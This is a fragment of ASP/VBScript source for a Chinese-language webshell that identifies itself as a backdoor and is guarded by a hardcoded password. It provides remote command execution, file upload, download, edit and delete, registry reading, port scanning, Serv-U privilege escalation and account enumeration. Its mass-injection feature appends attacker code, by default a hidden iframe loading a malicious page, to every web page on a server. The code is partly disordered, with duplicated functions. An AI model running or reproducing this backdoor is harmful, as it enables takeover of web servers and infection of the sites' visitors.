RRS("<td width=""359""><input type=""text"" name=""fd"" value="""&s&"""
size=60></td>")
RRS("<td width=""69""> </td>")
RRS("</tr><tr><td>要挂马的代码:</td>")
RRS("<td><textarea name=""code"" cols=58
rows=""3"">"&addcode&"</textarea></td>")
RRS("<td><input name=""submit"" type=""submit"" value=""开始""></td>")
RRS("</tr></table></form> ")
End If
Function IsPattern(patt,str)
Set regEx=New RegExp
regEx.Pattern=patt
regEx.IgnoreCase=True
retVal=regEx.Test(str)
Set regEx=Nothing
If retVal=True Then
IsPattern=True
Else
IsPattern=False
End If
End Function
if request.form("submit")<>"" then
If s="" or addcode="" Then
RRS "<font color=red>请输入挂马的路径或代码!</font>"
response.end
else If IsPattern("[^ab]{1}:{1}(\\|\/)",s) Then sch s
End If
end if
Sub sch(s)
oN eRrOr rEsUmE nExT
Set fs=Server.createObject("Scripting.FileSystemObject")
Set fd=fs.GetFolder(s)
Set fi=fd.Files
Set sf=fd.SubFolders
For Each f in fi
rtn=f.path
step_all rtn
Next
If sf.Count<>0 Then
For Each l In sf
sch l
Next
End If
End Sub
Sub step_all(agr)
retVal=IsPattern("(\\|\/)
(default|index|conn|admin|bbs|reg|help|upfile|upload|cart|class|login|d
iy|no|ok|del|config|sql|user|ubb|ftp|asp|top|new|open|name|email|img|im
ages|web|blog|save|data|add|edit|game|about|manager|book|bt|config|mp3|
vod|error|copy|move|down|system|logo|QQ|520|newup|myup|play|show|view|i
p|err404|send|foot|char|info|list|shop|err|nc|ad|flash|text|admin_upfil
e|admin_upload|upfile_load|upfile_soft|upfile_photo|upfile_softpic|vip|
505)\.(htm|html|asp|php|jsp|aspx|cgi|js)\b",agr)
If retVal Then
step1 agr
step2 agr
Else
Exit Sub
End If
End Sub
Sub step1(str1)
RRS "<div style='line-height:20px'>√ "&str1&" _"
RRs "<a href='javascript:FullForm("""&replace(str1,"\","\\")
&""",""DownFile"")' class='am' title='下载'>下载</a> "
RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")
&""",""EditFile"")' class='am' title='编辑'>编辑</a> "
RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")
&""",""DelFile"")'onclick='return yesok()' class='am' title='删除'>删除
</a> "
RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")
&""",""CopyFile"")' class='am' title='复制'>复制</a> "
RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")
&""",""MoveFile"")' class='am' title='移动'>移动</a></div>"
End Sub
Sub step2(str2)
Set fs=Server.createObject("Scripting.FileSystemObject")
isExist=fs.FileExists(str2)
If isExist Then
Set f=fs.GetFile(str2)
Set f_addcode=f.OpenAsTextStream(8,-2)
if left(right(str2,8),4)="conn" then
f_addcode.Write
else
f_addcode.Write addcode
f_addcode.Close
Set f=Nothing
End If
end if
Set fs=Nothing
End Sub
Err.Clear
Case "Cplgm"
Fpath=Request("fd")
addcode = Request("code")
addcode2 = Request("code2")
pcfile=request("pcfile")
checkbox=request("checkbox")
ShowMsg=request("ShowMsg")
FType=request("FType")
M=request("M")
if Ftype="" then
Ftype="txt|htm|html|asp|php|jsp|aspx|cgi|cer|asa|cdx"
if Fpath="\" then Fpath=Server.MapPath("\")
if Fpath="." or Fpath="" then Fpath=Server.MapPath("/")
if addcode="" then addcode="<iframe src=http://127.0.0.1/m.htm
width=0 height=0></iframe>"
if checkbox="" then checkbox=request("checkbox")
if pcfile="" then
pcfileName=Request.ServerVariables("SCRIPT_NAME")
pcfilek=split(pcfileName,"/")
pcfilen=ubound(pcfilek)
pcfile=pcfilek(pcfilen)
end if
RRS ("<b>网站根目录</b>- "&Server.MapPath("/")&"<br>")
RRS ("<b>本程序目录</b>- "&Server.MapPath("."))
RRS "<form method=POST><div style='color:#3399ff'><b>["
if M="1" then RRS"批量挂马器-批量挂马"
if M="2" then RRS"批量清马器-清除别人的网马"
if M="3" then RRS"批量替换器-文件替换修改工具"
if M="" then response.end
RRS "]</b></div><table width=100% border=0><tr><td>文件路径:
</td>"
RRS "<td><input type=text name=fd value=""\"" size=40> 填“\”
即网站根目录;“.”为程序所在目录</td></tr>"
if M="1" then RRS "<tr><td>过滤重复:</td><td><input class=c
name='checkbox' checked='checked' type=checkbox value=""checked""
"&checkbox&"> 防止一个页面中有多个重复的代码</td></tr>"
RRS "<tr><td>排除文件:</td>"
RRS "<td><input name='pcfile' type=text id='pcfile'
value='"&pcfile&"' size=40> 输入不想被修改的文件名,例如:
1.asp|2.asp|3.asp</td></tr>"
RRS "<tr><td>文件类型:</td>"
RRS "<td><input name='FType' type=text id='FType'
value='"&Ftype&"' size=40> 输入要修改的文件类型[扩展名],例如:
htm|html|asp|php|jsp|aspx|cgi</td></tr><tr><td><font color=#3399ff>"
if M="1" then RRS"要挂的马:"
if M="2" then RRS"要清的马:"
if M="3" then RRS"查找内容:"
RRS"</font></td><td><textarea name=code cols=66
rows=3>"&addcode&"</textarea></td></tr>"
if M="3" then RRS "<tr><td><font color=#3399ff>替 换 为:
</font></td><td><textarea name=code2 cols=66
rows=3>"&addcode&"</textarea></td></tr>"
RRS "<tr><td></td><td> <input name=submit type=submit value=开
始执行> --标记解释--[成功:√ , 排除:× , 重复:<font color=red>×
</font>]</td></tr>"
RRS "</table></form>"
if request("submit")="开始执行" then
RRS"<div style='line-height:25px'><b>执行记录:</b><br>"
call InsertAllFiles(Fpath,addcode,pcfile)
RRS"</div>"
end if
Sub InsertAllFiles(Wpath,Wcode,pc)
Server.ScriptTimeout=999999999
if right(Wpath,1)<>"\" then Wpath=Wpath &"\"
Set WFSO = CreateObject("Scripting.FileSystemObject")
on error resume next
Set f = WFSO.GetFolder(Wpath)
Set fc2 = f.files
For Each myfile in fc2
Set FS1 = CreateObject("Scripting.FileSystemObject")
FType1=split(myfile.name,".")
FType2=ubound(FType1)
if Ftype2>0 then
FType3=LCase(FType1(FType2))
else
FType3="无"
end if
if Instr(LCase(pc),LCase(myfile.name))=0 and Instr
(LCase(FType),FType3)<>0 then
select case M
case "1"
if checkbox<>"checked" then
Set
tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2)
if left(myfile.name,4)="conn"
then
tfile.Write
RRS"√
"&Wpath&myfile.name
else
tfile.writeline Wcode
RRS"√
"&Wpath&myfile.name
tfile.close
end if
end if
if checkbox="checked" then
Set
tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
if Instr
(tfile1.readall,Wcode)=0 then
Set
tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2)
if left(myfile.name,4)
="conn" then
tfile.Write
RRS"×
"&Wpath&myfile.name
else
tfile.writeline Wcode
RRS"√
"&Wpath&myfile.name
tfile1.close
end if
else
RRS"<font
color=red>×</font> "&Wpath&myfile.name
tfile1.close
end if
Set tfile1=Nothing
end if
case "2"
Set tfile1=FS1.opentextfile
(Wpath&""&myfile.name,1,-2)
NewCode=Replace
(tfile1.readall,Wcode,"")
Set
objCountFile=WFSO.CreateTextFile(Wpath&myfile.name,True)
objCountFile.Write NewCode
objCountFile.Close
RRS"√ "&Wpath&myfile.name
Set objCountFile=Nothing
case "3"
Set tfile1=FS1.opentextfile
(Wpath&""&myfile.name,1,-2)
NewCode=Replace
(tfile1.readall,Wcode,addCode2)
Set
objCountFile=WFSO.CreateTextFile(Wpath&myfile.name,True)
objCountFile.Write NewCode
objCountFile.Close
RRS"√ "&Wpath&myfile.name
Set objCountFile=Nothing
case else
RRS"大哥,别乱来.":response.end
end select
else
RRS"× "&Wpath&myfile.name
end if
RRS " → <a href='javascript:FullForm("""&replace
(Wpath&myfile.name,"\","\\")&""",""DownFile"")' class='am' title='下
载'>下载</a> "
RRS "<a href='javascript:FullForm("""&replace
(Wpath&myfile.name,"\","\\")&""",""EditFile"")' class='am' title='编
辑'>编辑</a> "
RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")
&""",""DelFile"")' onclick='return yesok()' class='am' title='删除'>删
除</a> "
RRS "<a href='javascript:FullForm("""&replace
(Wpath&myfile.name,"\","\\")&""",""CopyFile"")' class='am' title='复
制'>复制</a> "
RRS "<a href='javascript:FullForm("""&replace
(Wpath&myfile.name,"\","\\")&""",""MoveFile"")' class='am' title='移
动'>移动</a><br>"
Next
Set fsubfolers = f.SubFolders
For Each f1 in fsubfolers
NewPath=Wpath&""&f1.name
InsertAllFiles NewPath,Wcode,pc
Next
set tfile=nothing
Set FSO = Nothing
set tfile=nothing
set tfile2=nothing
Set WFSO = Nothing
End Sub
Case "ReadREG":call ReadREG()
Case "Show1File":Set ABC=New LBF:ABC.Show1File(Session
("FolderPath")):Set ABC=Nothing
Case "DownFile":DownFile FName:ShowErr()
Case "DelFile":Set ABC=New LBF:ABC.DelFile(FName):Set ABC=Nothing
Case "EditFile":Set ABC=New LBF:ABC.EditFile(FName):Set ABC=Nothing
Case "CopyFile":Set ABC=New LBF:ABC.CopyFile(FName):Set ABC=Nothing
Case "MoveFile":Set ABC=New LBF:ABC.MoveFile(FName):Set ABC=Nothing
Case "DelFolder":Set ABC=New LBF:ABC.DelFolder(FName):Set ABC=Nothing
Case "CopyFolder":Set ABC=New LBF:ABC.CopyFolder(FName):Set
ABC=Nothing
Case "MoveFolder":Set ABC=New LBF:ABC.MoveFolder(FName):Set
ABC=Nothing
Case "NewFolder":Set ABC=New LBF:ABC.NewFolder(FName):Set ABC=Nothing
Case "UpFile":UpFile()
Case "Cmd1Shell":Cmd1Shell()
Case "Logout":Session.Contents.Remove("web2a2dmin"):Response.Redirect
URL
Case "DbManager":DbManager()
Case "Course":Course()
Case "ServerInfo":ServerInfo()
Case Else MainForm()
End Select
if Action<>"Servu" then ShowErr()
RRS"</body></html>"
%>
打包文件下载
Server.ScriptTimeout=999999999
Response.Buffer =true
On Error Resume Next
UserPass="643617" '密码
mName="BY:.尐飛" '后门名字
Copyright="注:请勿用于非法用途,否则后果作者概不负责" '版权
Server.ScriptTimeout=999999999
Response.Buffer =true
On Error Resume Next
sub ShowErr()
If Err Then
RRS"<br><a href='javascript:history.back()'><br> " &
Err.Description & "</a><br>"
Err.Clear:Response.Flush
End If
end sub
Sub RRS(str)
response.write(str)
End Sub
Function RePath(S)
RePath=Replace(S,"\","\\")
End Function
Function RRePath(S)
RRePath=Replace(S,"\\","\")
End Function
URL=Request.ServerVariables("URL")
ServerIP=Request.ServerVariables("LOCAL_ADDR")
Action=Request("Action")
RootPath=Server.MapPath(".")
WWWRoot=Server.MapPath("/")
serveru=request.servervariables("http_host")&url
serverp=userpass
FolderPath=Request("FolderPath")
FName=Request("FName")
BackUrl="<br><br><center><a href='javascript:history.back()'>返回
</a></center>"
RRS"<html><meta http-equiv=""Content-Type"" content=""text/html;
charset=gb2312"">"
RRS"<title>"&mName1&" - "&ServerIP&" </title>"
RRS"<style type=""text/css"">"
RRS"body,td{font-size: 12px;background-color:#000000;color:#eee;}"
RRS"input,select,textarea{font-size: 12px;background-
color:#ddd;border:1px solid #fff}"
RRS".C{background-color:#000000;border:0px}"
RRS".cmd{background-color:#000;color:#FFF}"
RRS"body{margin: 0px;margin-left:4px;}"
RRS"a{color:#ddd;text-decoration: none;}a:hover
{color:red;background:#000}"
RRS".am{color:#888;font-size:11px;}"
RRS"</style>"
RRS"<script language=javascript>function killErrors(){return true;}
window.onerror=killErrors;"
RRS"function yesok(){if (confirm(""确认要执行此操作吗?""))return
true;else return false;}"
RRS"function runClock(){theTime = window.setTimeout(""runClock()"",
100);var today = new Date();var display= today.toLocaleString
();window.status=""→"&AD&" --""+display;}runClock();"
RRS"function ShowFolder(Folder){top.addrform.FolderPath.value =
Folder;top.addrform.submit();}"
RRS"function FullForm(FName,FAction){top.hideform.FName.value =
FName;if(FAction==""CopyFile""){DName = prompt(""请输入复制到目标文件全
名称"",FName);top.hideform.FName.value += ""||||""+DName;}else if
(FAction==""MoveFile""){DName = prompt(""请输入移动到目标文件全名
称"",FName);top.hideform.FName.value += ""||||""+DName;}else if
(FAction==""CopyFolder""){DName = prompt(""请输入移动到目标文件夹全名称
"",FName);top.hideform.FName.value += ""||||""+DName;}else if
(FAction==""MoveFolder""){DName = prompt(""请输入移动到目标文件夹全名称
"",FName);top.hideform.FName.value += ""||||""+DName;}else if
(FAction==""NewFolder""){DName = prompt(""请输入要新建的文件夹全名
称"",FName);top.hideform.FName.value = DName;}else{DName = ""Other"";}
if(DName!=null){top.hideform.Action.value =
FAction;top.hideform.submit();}else{top.hideform.FName.value = """";}}"
RRS"</script>"
rrs "<body"
If Action="" then RRS " scroll=no"
rrs ">"
Dim ObT(13,2)
ObT(0,0) = "Scripting.FileSystemObject"
ObT(0,2) = "文件操作组件"
ObT(1,0) = "wscript.shell"
ObT(1,2) = "命令行执行组件"
ObT(2,0) = "ADOX.Catalog"
ObT(2,2) = "ACCESS建库组件"
ObT(3,0) = "JRO.JetEngine"
ObT(3,2) = "ACCESS压缩组件"
ObT(4,0) = "Scripting.Dictionary"
ObT(4,2) = "数据流上传辅助组件"
ObT(5,0) = "Adodb.connection"
ObT(5,2) = "数据库连接组件"
ObT(6,0) = "Adodb.Stream"
ObT(6,2) = "数据流上传组件"
ObT(7,0) = "SoftArtisans.FileUp"
ObT(7,2) = "SA-FileUp 文件上传组件"
ObT(8,0) = "LyfUpload.UploadFile"
ObT(8,2) = "刘云峰文件上传组件"
ObT(9,0) = "Persits.Upload.1"
ObT(9,2) = "ASPUpload 文件上传组件"
ObT(10,0) = "JMail.SmtpMail"
ObT(10,2) = "JMail 邮件收发组件"
ObT(11,0) = "CDONTS.NewMail"
ObT(11,2) = "虚拟SMTP发信组件"
ObT(12,0) = "SmtpMail.SmtpMail.1"
ObT(12,2) = "SmtpMail发信组件"
ObT(13,0) = "Microsoft.XMLHTTP"
ObT(13,2) = "数据传输组件"
For i=0 To 13
Set T=Server.CreateObject(ObT(i,0))
If -2147221005 <> Err Then
IsObj=" √"
Else
IsObj=" ×"
Err.Clear
End If
Set T=Nothing
ObT(i,1)=IsObj
Next
If FolderPath<>"" then
Session("FolderPath")=RRePath(FolderPath)
End If
If Session("FolderPath")="" Then
FolderPath=RootPath
Session("FolderPath")=FolderPath
End if
Function MainForm()
RRS"<form name=""hideform"" method=""post"" action="""&URL&"""
target=""FileFrame"">"
RRS"<input type=""hidden"" name=""Action"">"
RRS"<input type=""hidden"" name=""FName"">"
RRS"</form>"
RRS"<table width='100%' height='100%' border=0 cellpadding='0'
cellspacing='0'>"
RRS"<tr><td height='30' colspan='2'>"
RRS"<table width='100%'>"
RRS"<form name='addrform' method='post' action='"&URL&"'
target='_parent'>"
RRS"<tr><td width='60' align='center'>地址栏:</td><td>"
RRS"<input name='FolderPath' style='width:100%' value='"&Session
("FolderPath")&"'>"
RRS"</td><td width='140' align='center'><input name='Submit'
type='submit' value='转到'> <input type='submit' value='刷新主窗口'
onclick='FileFrame.location.reload()'>"
RRS"</td></tr></form></table></td></tr><tr><td width='170'>"
RRS"<iframe name='Left' src='?Action=MainMenu' width='100%'
height='100%' frameborder='0'></iframe></td>"
RRS"<td>"
RRS"<iframe name='FileFrame' src='?Action=Show1File' width='100%'
height='100%' frameborder='1'></iframe>"
RRS"</td></tr></table>"
End Function
if request("web")="admin" then
Session("web2a2dmin") = UserPass
URL()
end if
Function MainForm()
RRS"<form name=""hideform"" method=""post"" action="""&URL&"""
target=""FileFrame"">"
RRS"<input type=""hidden"" name=""Action"">"
RRS"<input type=""hidden"" name=""FName"">"
RRS"</form>"
RRS"<table width='100%' height='100%' border=0 cellpadding='0'
cellspacing='0'>"
RRS"<tr><td height='30' colspan='2'>"
RRS"<table width='100%'>"
RRS"<form name='addrform' method='post' action='"&URL&"'
target='_parent'>"
RRS"<tr><td width='60' align='center'>地址栏:</td><td>"
RRS"<input name='FolderPath' style='width:100%' value='"&Session
("FolderPath")&"'>"
RRS"</td><td width='140' align='center'><input name='Submit'
type='submit' value='转到'> <input type='submit' value='刷新主窗口'
onclick='FileFrame.location.reload()'>"
RRS"</td></tr></form></table></td></tr><tr><td width='170'>"
RRS"<iframe name='Left' src='?Action=MainMenu' width='100%'
height='100%' frameborder='0'></iframe></td>"
RRS"<td>"
RRS"<iframe name='FileFrame' src='?Action=Show1File' width='100%'
height='100%' frameborder='1'></iframe>"
RRS"</td></tr></table>"
End Function
Function MainMenu()
RRS"<table width='100%' cellspacing='0' cellpadding='0'>"
RRS"<tr><td height='5'></td></tr>"
RRS"<tr><td><center><a href='"&SiteURL2&"' target='_blank'><font
color=red>"&mName2&"</font></center></a><hr hight=1 width='100%'>"
RRS"</td></tr>"
If ObT(0,1)=" ×" Then
RRS"<tr><td height='24'>无权限</td></tr>"
Else
RRS"<tr><td height=22 onmouseover=""menu1.style.display=''""> ↓查看硬
盘<div id=menu1 style=""width:100%;display='none'""
onmouseout=""menu1.style.display='none'"">"
Set ABC=New LBF:RRS ABC.ShowDriver():Set ABC=Nothing
RRS"</div></td></tr><tr><td height='20'><a href='javascript:ShowFolder
("""&RePath(WWWRoot)&""")'>->站点根目录</a></td></tr>"
RRS"<tr><td height='20'><a href='javascript:ShowFolder("""&RePath
(RootPath)&""")'>→本程序目录</a></td></tr>"
RRS"<tr><td height='20'><a href='javascript:ShowFolder(""C:\\Program
Files"")'>→Program Files</a></td></tr>"
RRS"<tr><td height='20'><a href='javascript:ShowFolder(""C:\\Documents
and Settings\\All Users\\Documents"")'>->Documents</a></td></tr>"
RRS"<tr><td height='20'><a href='javascript:ShowFolder(""C:\\Documents
and Settings\\All Users\\Application Data\\Symantec\\pcAnywhere"")'>-
>pcAnywhere</a></td></tr>"
RRS"<tr><td height='20'><a href='javascript:ShowFolder(""C:\\Documents
and Settings\\All Users\\「开始」菜单\\程序"")'>->开始 <b>→</b> 程序
<hr></a></td></tr>"
End If
RRS"<tr><td height='22'><a href='?Action=Course' target='FileFrame'>→
系统服务-用户账号</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=getTerminalInfo'
target='FileFrame'>→终端端口-自动登录</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=ServerInfo'
target='FileFrame'>→服务信息-组件支持</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=Cmd1Shell' target='FileFrame'>
→执行CMD命令</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=ScanPort' target='FileFrame'>
→端口扫描器</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=Servu' target='FileFrame'>→
Serv-u提权</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=ReadREG' target='FileFrame'>→
读取注册表</a></td></tr>"
RRS"<tr><td height='20'><a href='javascript:FullForm("""&RePath
(Session("FolderPath")&"\NewFolder")&""",""NewFolder"")'>→新建目录
<hr></a></td></tr>"
RRS"<tr><td height='20'><a href='?Action=EditFile' target='FileFrame'>
→新建文本</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=UpFile' target='FileFrame'>→
上传文件</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=kmuma' target='FileFrame'>→查
找木马</b></a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=Cplgm&M=1' target='FileFrame'>
→高级挂马</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=Cplgm&M=2' target='FileFrame'>
→批量清马</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=Cplgm&M=3' target='FileFrame'>
→批量替换</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=plgm' target='FileFrame'></b>
→低级挂马</a></b></td></tr>"
RRS"<tr><td height='22'><a href='?Action=Logout' target='_top'>→退出登
录</a></td></tr>"
RRS"<tr><td align=center
style='color:red'><hr>"&Copyright2&"</td></tr></table>"
RRS"</table>"
End Function
Sub unPack(thePath)
On Error Resume Next
Server.ScriptTimeOut = 5000
Dim rs, ws, str, conn, stream, connStr, theFolder
str = Server.MapPath(".") & "\"
Set rs = CreateObject("ADODB.RecordSet")
Set stream = CreateObject("ADODB.Stream")
Set conn = CreateObject("ADODB.Connection")
connStr = "Provider=Microsoft.Jet.OLEDB.4.0;Data
Source=" & thePath & ";"
conn.Open connStr
rs.Open "FileData", conn, 1, 1
stream.Open
stream.Type = 1
Do Until rs.Eof
theFolder = Left(rs("thePath"), InStrRev(rs
("thePath"), "\"))
If fsoX.FolderExists(str & theFolder) = False
Then
createFolder(str & theFolder)
End If
stream.SetEos()
stream.Write rs("fileContent")
stream.SaveToFile str & rs("thePath"), 2
rs.MoveNext
Loop
rs.Close
conn.Close
stream.Close
Set ws = Nothing
Set rs = Nothing
Set stream = Nothing
Set conn = Nothing
End Sub
Sub createFolder(thePath)
Dim i
i = Instr(thePath, "\")
Do While i > 0
If fsoX.FolderExists(Left(thePath, i)) = False
Then
fsoX.CreateFolder(Left(thePath, i - 1))
End If
If InStr(Mid(thePath, i + 1), "\") Then
i = i + Instr(Mid(thePath, i + 1), "\")
Else
i = 0
End If
Loop
End Sub
Function Course()
SI="<br><table width='600' bgcolor='menu' border='0' cellspacing='1'
cellpadding='0' align='center'>"
SI=SI&"<tr><td height='20' colspan='3' align='center' bgcolor='menu'>系
统用户与服务</td></tr>"
on error resume next
for each obj in getObject("WinNT://.")
err.clear
if OBJ.StartType="" then
SI=SI&"<tr>"
SI=SI&"<td height=""20"" bgcolor=""#FFFFFF""> "
SI=SI&obj.Name
SI=SI&"</td><td bgcolor=""#FFFFFF""> "
SI=SI&"系统用户(组)"
SI=SI&"</td></tr>"
SI0="<tr><td height=""20"" bgcolor=""#FFFFFF""
colspan=""2""> </td></tr>"
end if
if OBJ.StartType=2 then lx="自动"
if OBJ.StartType=3 then lx="手动"
if OBJ.StartType=4 then lx="禁用"
if LCase(mid(obj.path,4,3))<>"win" and OBJ.StartType=2 then
SI1=SI1&"<tr><td height=""20""
bgcolor=""#FFFFFF""> "&obj.Name&"</td><td height=""20""
bgcolor=""#FFFFFF""> "&obj.DisplayName&"<tr><td height=""20""
bgcolor=""#FFFFFF"" colspan=""2"">[启动类型:"&lx&"]<font
color=#FF0000> "&obj.path&"</font></td></tr>"
else
SI2=SI2&"<tr><td height=""20""
bgcolor=""#FFFFFF""> "&obj.Name&"</td><td height=""20""
bgcolor=""#FFFFFF""> "&obj.DisplayName&"<tr><td height=""20""
bgcolor=""#FFFFFF"" colspan=""2"">[启动类型:"&lx&"]<font
color=#3399FF> "&obj.path&"</font></td></tr>"
end if
next
RRS SI&SI0&SI1&SI2&"</table>"
End Function
Function ServerInfo()
SI="<br><table width='80%' bgcolor='menu' border='0' cellspacing='1'
cellpadding='0' align='center'>"
SI=SI&"<tr><td height='20' colspan='3' align='center' bgcolor='menu'>服
务器组件信息</td></tr>"
SI=SI&"<tr align='center'><td height='20' width='200'
bgcolor='#FFFFFF'>服务器名</td><td bgcolor='#FFFFFF'> </td><td
bgcolor='#FFFFFF'>"&request.serverVariables("SERVER_NAME")&"</td></tr>"
SI=SI&"<form method=post action='http://www.ip138.com/index.asp'
name='ipform' target='_blank'><tr align='center'><td height='20'
width='200' bgcolor='#FFFFFF'>服务器IP</td><td
bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"
SI=SI&"<input type='text' name='ip' size='15'
value='"&Request.ServerVariables("LOCAL_ADDR")
&"'style='border:0px'><input type='submit' value='查
询'style='border:0px'><input type='hidden' name='action'
value='2'></td></tr></form>"
SI=SI&"<tr align='center'><td height='20' width='200'
bgcolor='#FFFFFF'>服务器时间</td><td bgcolor='#FFFFFF'> </td><td
bgcolor='#FFFFFF'>"&now&" </td></tr>"
SI=SI&"<tr align='center'><td height='20' width='200'
bgcolor='#FFFFFF'>服务器CPU数量</td><td
bgcolor='#FFFFFF'> </td><td
bgcolor='#FFFFFF'>"&Request.ServerVariables("NUMBER_OF_PROCESSORS")
&"</td></tr>"
SI=SI&"<tr align='center'><td height='20' width='200'
bgcolor='#FFFFFF'>服务器操作系统</td><td
bgcolor='#FFFFFF'> </td><td
bgcolor='#FFFFFF'>"&Request.ServerVariables("OS")&"</td></tr>"
SI=SI&"<tr align='center'><td height='20' width='200'
bgcolor='#FFFFFF'>WEB服务器版本</td><td
bgcolor='#FFFFFF'> </td><td
bgcolor='#FFFFFF'>"&Request.ServerVariables("SERVER_SOFTWARE")
&"</td></tr>"
For i=0 To 13
SI=SI&"<tr align='center'><td height='20' width='200'
bgcolor='#FFFFFF'>"&ObT(i,0)&"</td><td bgcolor='#FFFFFF'>"&ObT(i,1)
&"</td><td bgcolor='#FFFFFF' align=left>"&ObT(i,2)&"</td></tr>"
Next
RRS SI
End Function
Function DownFile(Path)
Response.Clear
Set OSM = CreateObject(ObT(6,0))
OSM.Open
OSM.Type = 1
OSM.LoadFromFile Path
sz=InstrRev(path,"\")+1
Response.AddHeader "Content-Disposition", "attachment; filename=" &
Mid(path,sz)
Response.AddHeader "Content-Length", OSM.Size
Response.Charset = "UTF-8"
Response.ContentType = "application/octet-stream"
Response.BinaryWrite OSM.Read
Response.Flush
OSM.Close
Set OSM = Nothing
End Function
Function HTMLEncode(S)
if not isnull(S) then
S = replace(S, ">", ">")
S = replace(S, "<", "<")
S = replace(S, CHR(39), "'")
S = replace(S, CHR(34), """)
S = replace(S, CHR(20), " ")
HTMLEncode = S
end if
End Function
Function UpFile()
If Request("Action2")="Post" Then
Set U=new UPC : Set F=U.UA("LocalFile")
UName=U.form("ToPath")
If UName="" Or F.FileSize=0 then
SI="<br>请输入上传的完全路径后选择一个文件上传!"
Else
F.SaveAs UName
If Err.number=0 Then
SI="<center><br><br><br>文件"&UName&"上传成功!</center>"
End if
End If
Set F=nothing:Set U=nothing
SI=SI&BackUrl
RRS SI
ShowErr()
Response.End
End If
SI="<br><br><br><table border='0' cellpadding='0' cellspacing='0'
align='center'>"
SI=SI&"<form name='UpForm' method='post' action='"&URL&"?
Action=UpFile&Action2=Post' enctype='multipart/form-data'>"
SI=SI&"<tr><td>"
SI=SI&"上传路径:<input name='ToPath' value='"&RRePath(Session
("FolderPath")&"\diy3.asp")&"' size='40'>"
SI=SI&" <input name='LocalFile' type='file' size='25'>"
SI=SI&" <input type='submit' name='Submit' value='上传'>"
SI=SI&"</td></tr></form></table>"
RRS SI
End Function
Function Cmd1Shell()
checked=" checked"
If Request("SP")<>"" Then Session("ShellPath") = Request("SP")
ShellPath=Session("ShellPath")
if ShellPath="" Then ShellPath = "diy3.asp"
if Request("wscript")<>"yes" then checked=""
If Request("cmd")<>"" Then DefCmd = Request("cmd")
SI="<form method='post'>"
SI=SI&"SHELL路径:<input name='SP' value='"&ShellPath&"'
Style='width:70%'> "
SI=SI&"<input class=c type='checkbox' name='wscript'
value='yes'"&checked&">WScript.Shell"
SI=SI&"<input name='cmd' Style='width:92%' value='"&DefCmd&"'> <input
type='submit' value='执行'><textarea Style='width:100%;height:440;'
class='cmd'>"
If Request.Form("cmd")<>"" Then
if Request.Form("wscript")="yes" then
Set CM=CreateObject(ObT(1,0))
Set DD=CM.exec(ShellPath&" /c "&DefCmd)
aaa=DD.stdout.readall
SI=SI&aaa
else
On Error Resume Next
Set ws=Server.CreateObject("WScript.Shell")
Set ws=Server.CreateObject("WScript.Shell")
Set fso=Server.CreateObject("Scripting.FileSystemObject")
szTempFile = server.mappath("cmd.txt")
Call ws.Run (ShellPath&" /c " & DefCmd & " > " & szTempFile, 0, True)
Set fs = CreateObject("Scripting.FileSystemObject")
Set oFilelcx = fs.OpenTextFile (szTempFile, 1, False, 0)
aaa=Server.HTMLEncode(oFilelcx.ReadAll)
oFilelcx.Close
Call fso.DeleteFile(szTempFile, True)
SI=SI&aaa
end if
End If
SI=SI&chr(13)&"</textarea></form>"
RRS SI
End Function
if session("web2a2dmin")<>UserPass then
if request.form("pass")<>"" then
if request.form("pass")=UserPass then
session("web2a2dmin")=UserPass
response.redirect url
else
rrs"<br><br><br><b><div align=center><font size='14' color='red'>注:
请勿用于非法用途,否则后果自负!!!</font></b> <br><br><br><br><b><div
align=center><font size='14' color='lime'>HACK by:漫步云端
</font></b></p>"
end if
else
si="<center><div style='width:500px;border:1px solid
#222;padding:22px;margin:100px;'><br><a href='"&SiteURL&"'
target='_blank'>"&mname&"</a><hr><form action='"&url&"' method='post'>
密码:<input name='pass' type='password' size='22'> <input
type='submit' value='登录'><hr>"&Copyright&"</center>"
if instr(SI,SIC)<>0 then rrs sI
end if
response.end
end if
Dim T1
Class UPC
Dim D1,D2
Public Function Form(F)
F=lcase(F)
If D1.exists(F) then:Form=D1(F):else:Form="":end if
End Function
Public Function UA(F)
F=lcase(F)
If D2.exists(F) then:set UA=D2(F):else:set UA=new FIF:end if
End Function
Private Sub Class_Initialize
Dim
TDa,TSt,vbCrlf,TIn,DIEnd,T2,TLen,TFL,SFV,FStart,FEnd,DStart,DEnd,UpName
set D1=CreateObject(ObT(4,0))
if Request.TotalBytes<1 then Exit Sub
set T1 = CreateObject(ObT(6,0))
T1.Type = 1 : T1.Mode =3 : T1.Open
T1.Write Request.BinaryRead(Request.TotalBytes)
T1.Position=0 : TDa =T1.Read : DStart = 1
DEnd = LenB(TDa)
set D2=CreateObject(ObT(4,0))
vbCrlf = chrB(13) & chrB(10)
set T2 = CreateObject(ObT(6,0))
TSt = MidB(TDa,1, InStrB(DStart,TDa,vbCrlf)-1)
TLen = LenB (TSt)
DStart=DStart+TLen+1
while (DStart + 10) < DEnd
DIEnd = InStrB(DStart,TDa,vbCrlf & vbCrlf)+3
T2.Type = 1 : T2.Mode =3 : T2.Open
T1.Position = DStart
T1.CopyTo T2,DIEnd-DStart
T2.Position = 0 : T2.Type = 2 : T2.Charset ="gb2312"
TIn = T2.ReadText : T2.Close
DStart = InStrB(DIEnd,TDa,TSt)
FStart = InStr(22,TIn,"name=""",1)+6
FEnd = InStr(FStart,TIn,"""",1)
UpName = lcase(Mid (TIn,FStart,FEnd-FStart))
if InStr (45,TIn,"filename=""",1) > 0 then
